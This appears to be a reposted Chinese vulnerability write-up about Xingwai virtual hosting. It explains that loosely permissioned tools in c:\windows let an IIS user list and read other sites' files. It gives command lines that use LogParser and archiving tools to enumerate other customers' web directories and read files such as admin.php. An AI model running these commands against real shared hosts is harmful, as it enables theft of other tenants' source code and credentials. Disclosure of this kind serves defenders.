星外虛擬機器主機跨web目錄檔案讀取漏洞

來源:互聯網
上載者:User

標籤:style   blog   http   color   os   ar   strong   檔案   2014   

星外虛擬機器主機跨目錄讀取檔案漏洞,需要一定條件。

問題發生在以下檔案,這些檔案都沒有嚴格的設定執行許可權,當前的IIS使用者能夠順利的利用它們執行命令:

c:\windows\7i24IISLOG.exec:\windows\7i24IISLOG2.exec:\windows\7i24IISLOG3.exec:\windows\7i24IISLOG4.exec:\windows\7i24tool.exec:\windows\rsb.exe

 這些檔案貌似是星外處理日誌、設定許可權的,其中的7i24IISLOG.exe其實就是LogParser,LogParser是一款強大日誌分析工具,下面利用它來列web目錄:

c:\windows\7i24IISLOG  "select top 100 path from e:\host\*.*" -i:FS -rtp:-1

返回如下:

讀取其中一個站的目錄資訊:

c:\windows\7i24IISLOG  "select top 100 path from e:\host\0233ab\*.*" -i:FS -rtp:-1

 

下面讀取檔案內容:

c:\windows\7i24IISLOG "select text from e:\host\0233ab\web\admin.php" -i:textline -rtp:-1

 

7i24IISLOG3.exe能夠打包ISO檔案,利用它同樣的也可以列出目錄檔案資訊:

c:\windows\7i24IISLOG3 e:\host\0233ab\web\ c:\windows\temp\123.rar

 

同樣的還有rbs.exe

c:\windows\rbs -r -v 024dbjj e:\host\0233ab\web\*.*

 

星外虛擬機器主機跨web目錄檔案讀取漏洞

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.